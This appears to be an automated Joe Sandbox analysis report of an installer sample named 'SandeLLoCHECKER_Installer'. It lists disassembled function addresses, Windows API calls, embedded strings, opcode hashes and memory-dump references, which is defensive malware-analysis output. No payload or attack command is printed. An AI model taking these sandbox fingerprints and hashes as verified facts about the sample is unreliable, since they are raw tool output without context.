                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 847901565-0
                                                                                                                        • Opcode ID: 4672d844e4c20d0fc2b0e48c54c9193d532ddca76408f4527c996ba67debd8c9
                                                                                                                        • Instruction ID: 58a6541f97f0ea214a32ad9bc03ddbbfb429945edefa31006178fa93e9bf26cd
                                                                                                                        • Opcode Fuzzy Hash: 4672d844e4c20d0fc2b0e48c54c9193d532ddca76408f4527c996ba67debd8c9
                                                                                                                        • Instruction Fuzzy Hash: A0418CB0A00A46EFDB10DF65C908B5ABBB4FF05325F144239E924D7A91DB76E918CB90
                                                                                                                        Function 008583D0 Relevance: 4.5, APIs: 3, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(0000001B,000000FC), ref: 008583E9
                                                                                                                        • SetWindowLongW.USER32(0000001B,000000FC,?), ref: 008583F7
                                                                                                                        • DestroyWindow.USER32(0000001B), ref: 00858423
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$Destroy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3055081903-0
                                                                                                                        • Opcode ID: 882a92daa93b0cb0c20940c44f3cbf20521691085332990f2774f3ea4178cbcd
                                                                                                                        • Instruction ID: 99c4b4ed5931059fa55bc70286a94711b45d5202f443534a4d3e448b9d815d9d
                                                                                                                        • Opcode Fuzzy Hash: 882a92daa93b0cb0c20940c44f3cbf20521691085332990f2774f3ea4178cbcd
                                                                                                                        • Instruction Fuzzy Hash: 2EF0BD31004A12DBDB715F28ED04F967BE1BF19722F14462DE8AAD25E0DB60A8459B04
                                                                                                                        Function 008B5450 Relevance: 3.1, APIs: 2, Instructions: 75COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(00000000,000000FC), ref: 008B54BF
                                                                                                                        • SetWindowLongW.USER32(00000000,000000FC,?), ref: 008B54CD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1378638983-0
                                                                                                                        • Opcode ID: c7ee30231e81906061b89443ed90a62f27879d5cf56623c2ca64c2f77e4fdd2c
                                                                                                                        • Instruction ID: e3743907a9695e3f41d5217ee5fae2815589ab37ded54eeea85473c720610027
                                                                                                                        • Opcode Fuzzy Hash: c7ee30231e81906061b89443ed90a62f27879d5cf56623c2ca64c2f77e4fdd2c
                                                                                                                        • Instruction Fuzzy Hash: 8B316D71904A05EFCB20DF69CA44B9AFBB4FF05321F144269E424E77D0DB31AA91CB90
                                                                                                                        Function 00868BB0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtdllDefWindowProc_W.NTDLL(?,-00002000,?,?,00867307,?,?,?,?,?,?,?,?,00867178,?,?), ref: 00868C00
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: NtdllProc_Window
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4255912815-0
                                                                                                                        • Opcode ID: 63f85adfb0d30733d3b84ac34caeacdebb13f7390948e2f19105dd4345360b1f
                                                                                                                        • Instruction ID: af3f042c74f7c67d5fdb8fb989013e6c0272247a7f69e5b15b06d55d8886b451
                                                                                                                        • Opcode Fuzzy Hash: 63f85adfb0d30733d3b84ac34caeacdebb13f7390948e2f19105dd4345360b1f
                                                                                                                        • Instruction Fuzzy Hash: 98F0A0B4104141DEE3508F14C8A8A69BBB6FB59316F4A47F6E08CC61A0CB35CE80DF30
                                                                                                                        Function 00856460 Relevance: .1, Instructions: 140COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3f9a9b53c090ba865043bcdfc14e29686ec797fee7df6294884cc6d0890cd570
                                                                                                                        • Instruction ID: 38588357fc30b173382226d32ecb7af06bcedd39df7d69de756ec7e3a76a8d99
                                                                                                                        • Opcode Fuzzy Hash: 3f9a9b53c090ba865043bcdfc14e29686ec797fee7df6294884cc6d0890cd570
                                                                                                                        • Instruction Fuzzy Hash: 6671F7B1801B48CFE761CF78C94478ABBF0BB05324F144A5DD4A99B3D1D3B9A648CB91
                                                                                                                        Function 0085F6E0 Relevance: .1, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: add25523fbe0612e6f8dfdf724655e9516a3c6b335f6fd2773d4f72098864461
                                                                                                                        • Instruction ID: c445fe63f81b8571df7f0f4cfb9f51880c3bf04900ffd324f05b7caec09f2bf9
                                                                                                                        • Opcode Fuzzy Hash: add25523fbe0612e6f8dfdf724655e9516a3c6b335f6fd2773d4f72098864461
                                                                                                                        • Instruction Fuzzy Hash: 5F31D0B0405B84DEE721CF29C658747BFF0BB15728F104A5DD4A64BB91D3BAA508CB91
                                                                                                                        Function 008590B0 Relevance: .1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a8f00b05a249a8deed5bf5c16cdf337868ce036e21b2badfeba24ffc4b0e0fb9
                                                                                                                        • Instruction ID: 1c83ba70fcd56663b6a0afec326cea211ec3eb763cce695efb58247e5077000e
                                                                                                                        • Opcode Fuzzy Hash: a8f00b05a249a8deed5bf5c16cdf337868ce036e21b2badfeba24ffc4b0e0fb9
                                                                                                                        • Instruction Fuzzy Hash: E62158B0804788DFD710CF58C904B8ABBF4FB0A314F1186AED455AB791E7B9AA44CF90
                                                                                                                        Function 00858AF0 Relevance: .1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 746f774d4e2e8e6d857fe518a4eabffa0785a23a9c39e5c3d8d34e3720fd4cf1
                                                                                                                        • Instruction ID: 5bb45cdded01d96855cd079f62f333a111a50909d0652dc90a03ad79119fb99a
                                                                                                                        • Opcode Fuzzy Hash: 746f774d4e2e8e6d857fe518a4eabffa0785a23a9c39e5c3d8d34e3720fd4cf1
                                                                                                                        • Instruction Fuzzy Hash: 192158B0804788DFD710CF68C904B8ABBF4FB09314F1186AED455AB791E7B9AA44CB90
                                                                                                                        Function 008766A0 Relevance: .0, Instructions: 37COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9c0997b02f21be64610ded2890943ea108373f4f10ec2922f6030107ccf97664
                                                                                                                        • Instruction ID: 6f0c811e1da0195ff3096637d7ceae207e5e0f94d912e027ba211f5f7f832573
                                                                                                                        • Opcode Fuzzy Hash: 9c0997b02f21be64610ded2890943ea108373f4f10ec2922f6030107ccf97664
                                                                                                                        • Instruction Fuzzy Hash: 8E110CB1904608DFCB40CF58C544B89BBF4FB09328F2086AEE8189B381D3769A06CF84
                                                                                                                        Function 008772D0 Relevance: 22.7, APIs: 15, Instructions: 178windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000318,00000000,00000004), ref: 00877337
                                                                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00877345
                                                                                                                        • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0087735F
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00877377
                                                                                                                        • SendMessageW.USER32(?,0000130A,00000000,?), ref: 008773A8
                                                                                                                        • CreateRectRgn.GDI32(?,?,?,?), ref: 008773E2
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 008773F9
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00877415
                                                                                                                        • CreateRectRgn.GDI32(00000000,00000000,?,?), ref: 00877440
                                                                                                                        • CreateRectRgn.GDI32(?,?,?,?), ref: 0087745D
                                                                                                                        • SelectClipRgn.GDI32(00000000,00000000), ref: 00877474
                                                                                                                        • GetParent.USER32(?), ref: 00877484
                                                                                                                        • SendMessageW.USER32(00000000,00000136,?,?), ref: 00877495
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 008774AB
                                                                                                                        • DeleteObject.GDI32(?), ref: 008774B0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageRectSend$Create$DeleteObject$ClientClipParentSelect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1236051970-0
                                                                                                                        • Opcode ID: 345d9a8ec167b94b2f6c76bff150d213beca083c701c5b89ee0f691f94c30308
                                                                                                                        • Instruction ID: 1fd0fe6cfe632a5d18ddad862df5cd76aab1d25d80ed935664da81f887a70bac
                                                                                                                        • Opcode Fuzzy Hash: 345d9a8ec167b94b2f6c76bff150d213beca083c701c5b89ee0f691f94c30308
                                                                                                                        • Instruction Fuzzy Hash: 2D61FD72900219AFDB219FE4DD49FEEBBB9FF49710F104129F919AB2A0DB706941CB50
                                                                                                                        Function 0097E460 Relevance: 21.4, APIs: 4, Strings: 8, Instructions: 439COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(?,C7BA013E), ref: 0097E4C9
                                                                                                                        • IsWow64Process.KERNEL32(00000000), ref: 0097E4D0
                                                                                                                          • Part of subcall function 00960300: _wcsrchr.LIBVCRUNTIME ref: 00960339
                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 0097E551
                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 0097E5E7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcsrchr$Process$CurrentWow64
                                                                                                                        • String ID: "%s" $ /fvomus //$ /i //$ /p //$ EXE_CMD_LINE="%s "$ TRANSFORMS=":%d"$%s AI_SETUPEXEPATH="%s" SETUPEXEDIR="%s"$.x64
                                                                                                                        • API String ID: 657290924-2074823060
                                                                                                                        • Opcode ID: 381cd234dc2a2e17adbaca0b6c14228bf40fb2cadae71b476147744cb085497c
                                                                                                                        • Instruction ID: f30360118a65278eaa020aad38bb960a4617d457e3889f66c4d8cb3b7ce53203
                                                                                                                        • Opcode Fuzzy Hash: 381cd234dc2a2e17adbaca0b6c14228bf40fb2cadae71b476147744cb085497c
                                                                                                                        • Instruction Fuzzy Hash: 2AF1D431A006099FDB14DFA8C845BAEB7B9FF49314F1486ACE815EB2D1DB74AD04CB91
                                                                                                                        Function 0087BCF0 Relevance: 21.4, APIs: 4, Strings: 8, Instructions: 358libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00000043), ref: 0087BE18
                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitializeEmbeddedUI), ref: 0087BE31
                                                                                                                        • GetProcAddress.KERNEL32(00000043,ShutdownEmbeddedUI), ref: 0087BE3D
                                                                                                                        • GetProcAddress.KERNEL32(00000043,EmbeddedUIHandler), ref: 0087BE4A
                                                                                                                          • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HeapInit_thread_footer$AllocateLibraryLoadProcess
                                                                                                                        • String ID: build $173382f5$20.7$EmbeddedUIHandler$INAN$InitializeEmbeddedUI$SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll'$ShutdownEmbeddedUI
                                                                                                                        • API String ID: 2564778481-2084101031
                                                                                                                        • Opcode ID: be8af84de0fad3efd475c82b6166065ed41635b47b4be11a1f685c05fd86793f
                                                                                                                        • Instruction ID: 2d0ba5b34b0401d053ccd5b2305f127336c724a7be17874cab6cb7c4b16aa7cf
                                                                                                                        • Opcode Fuzzy Hash: be8af84de0fad3efd475c82b6166065ed41635b47b4be11a1f685c05fd86793f
                                                                                                                        • Instruction Fuzzy Hash: 2BD1BF71900209AFDB04DFA8CD55BEEBBB5FF04314F148629E815E72D1EB74AA04CBA1
                                                                                                                        Function 00994490 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 192fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSection.KERNEL32(00B31550,C7BA013E,00000010,?), ref: 009944CC
                                                                                                                          • Part of subcall function 0084A190: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
                                                                                                                        • EnterCriticalSection.KERNEL32(?,C7BA013E,00000010,?), ref: 009944D9
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0099450B
                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000), ref: 00994514
                                                                                                                        • WriteFile.KERNEL32(00000000,00A895CD,48E9084D,?,00000000,00AAA26C,00000001,?,00000000,?,00000000), ref: 00994596
                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000), ref: 0099459F
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 009945D5
                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 009945DE
                                                                                                                        • WriteFile.KERNEL32(00000000,00978683,1550B9FF,?,00000000,00AAD0FC,00000002,?,00000000,?,00000000,?,00000000,?,00000000), ref: 0099463F
                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00994648
                                                                                                                        • LeaveCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00994678
                                                                                                                          • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$BuffersFlushWrite$CriticalSection$AllocateEnterFindHeapInitializeLeaveResource
                                                                                                                        • String ID: v
                                                                                                                        • API String ID: 201293332-3261393531
                                                                                                                        • Opcode ID: 182ead1ea219338b84b1db402a35aa09ccc928e7975539054ca08e3af84afb39
                                                                                                                        • Instruction ID: befcb005b83c86b0f1ed8f9d82cadfab8e373a8e1a6a9ff3a94a289ff89f57b7
                                                                                                                        • Opcode Fuzzy Hash: 182ead1ea219338b84b1db402a35aa09ccc928e7975539054ca08e3af84afb39
                                                                                                                        • Instruction Fuzzy Hash: 8461AD71A01644EFEB01DFA8CD49FA9BBB8FF05314F144269F805DB2A1DB709915CBA1
                                                                                                                        Function 00858430 Relevance: 19.7, APIs: 10, Strings: 1, Instructions: 460stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ParentWindowlstrcmp
                                                                                                                        • String ID: #32770
                                                                                                                        • API String ID: 3676684576-463685578
                                                                                                                        • Opcode ID: 0f1a0fb318c70437b0164d8cc980d4a83bb33c01d9a9b477b32c375053970ef7
